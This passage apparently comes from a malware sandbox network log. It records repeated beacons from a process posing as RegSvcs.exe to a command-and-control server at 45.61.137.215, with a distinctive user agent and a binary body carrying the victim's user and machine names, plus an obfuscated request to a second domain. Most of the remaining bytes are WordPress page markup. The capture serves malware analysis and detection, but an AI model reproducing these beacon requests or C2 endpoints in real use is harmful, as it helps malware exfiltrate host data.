May 29, 2024 15:44:44.582983017 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:44:44.582989931 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 29, 2024 15:44:44.582997084 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 29, 2024 15:44:44.583004951 CEST	672	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 29, 2024 15:44:44.583010912 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:44:44.583024979 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:44:44.583031893 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:44:44.583081007 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.9	49775	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:44.907871962 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:44.913008928 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:47.513607979 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:45 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:47.513663054 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:44:47.513678074 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:44:47.513700962 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:44:47.513711929 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:44:47.513735056 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:44:47.513745070 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:44:47.513746977 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:44:47.513904095 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:44:47.513931036 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.9	49776	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:47.749478102 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:47.754427910 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:50.238756895 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:48 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:44:50.238770962 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:44:50.238785982 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:44:50.238791943 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 29, 2024 15:44:50.238804102 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 29, 2024 15:44:50.238811016 CEST	672	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 29, 2024 15:44:50.238940001 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:44:50.238945007 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:44:50.238961935 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 29, 2024 15:44:50.238965988 CEST	224	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.9	49777	34.132.146.171	80	3504	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:48.471144915 CEST	174	OUT	GET /dn03/?KvOx3=JJyTLDumWHTBkarN0VPanW2WZHOeobli2nsK+rVOrq2yAp2byhlCx/KUbNmL9DZVQlbp&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1 Host: www.banditsolana.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.9	49778	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:44:50.468523979 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:44:50.478200912 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:44:52.933528900 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:44:51 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" 